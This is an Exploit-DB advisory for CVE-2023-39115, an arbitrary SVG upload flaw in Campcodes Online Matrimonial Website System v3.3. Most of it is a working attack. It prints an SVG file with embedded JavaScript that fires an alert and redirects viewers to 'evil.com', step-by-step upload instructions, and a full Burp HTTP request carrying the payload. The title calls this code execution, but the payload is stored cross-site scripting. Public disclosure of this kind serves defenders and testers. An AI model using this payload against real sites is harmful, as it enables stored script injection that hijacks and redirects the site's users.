Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

EDB-ID:

51656

CVE:

2023-39115

EDB Verified:

Author:

Rajdip Dey Sarkar

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2023-08-04

Vulnerable App: 
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>


Steps to reproduce
--------------------------

 -Login with your creds
 -Navigate to this directory - /profile-settings
 -Click on Gallery -> Add New Image -> Browser -> Add Files
 -Choose the SVG file and upload done
 -Click the image!! Payload Triggered


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>
-----------------------------167707198418121100152548123485--
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services